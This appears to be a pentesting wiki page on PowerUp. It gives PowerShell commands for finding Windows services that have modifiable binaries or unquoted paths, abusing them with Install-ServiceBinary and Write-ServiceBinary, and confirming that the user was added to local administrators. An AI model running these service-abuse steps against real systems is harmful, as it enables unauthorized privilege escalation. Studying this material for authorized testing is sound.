PowerUp

PowerUp is a PowerShell tool used for privilege escalation on Windows systems. It helps identify misconfigurations and exploitable settings that allow users to elevate their privileges. It typically can be found at /share/windows-resources/powersploit/Privesc/PowerUp.ps1.

PowerShell commands for service interaction:

# Service status
Get-Service -Name 'BackupMonitor'

# Start/Stop the service
Start-Service -Name "<ServiceName>"
Stop-Service -Name "<ServiceName>" -Force

# Restart the service
Restart-Service -Name 'BackupMonitor' -Force

Invoke-AllChecks

Details with examples on how an abuse works:

help invoke-serviceabuse -examples

PrivescCheck and winPEAS can also be used for full coverage:

# PrivescCheck
Invoke-PrivEscCheck

# PEASS-ng
winPEASx64.exe -all

Enumerate potentially vulnerable services:

# Services that user can modify their binary path or change args to the binary
Get-ModifiableServiceFile

# Service that user can modify their configurations
Get-ModifiableService

# Abuse the enumerate service
Install-ServiceBinary -Name 'mysql'

# Restart the service
Restart-Service -Name 'mysqld' -Force

# Confirm that it worked
> net localgroup administrators

# Services with unquoted paths that also have a space in the name
Get-ServiceUnquoted
Get-UnquotedService

# Abuse
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

# Restart (ignore any erros)
Restart-Service GammaService

# Confirm
net localgroup administrators

PreviousPE Scripts Nextpspy

Last updated 6 months ago

Was this helpful?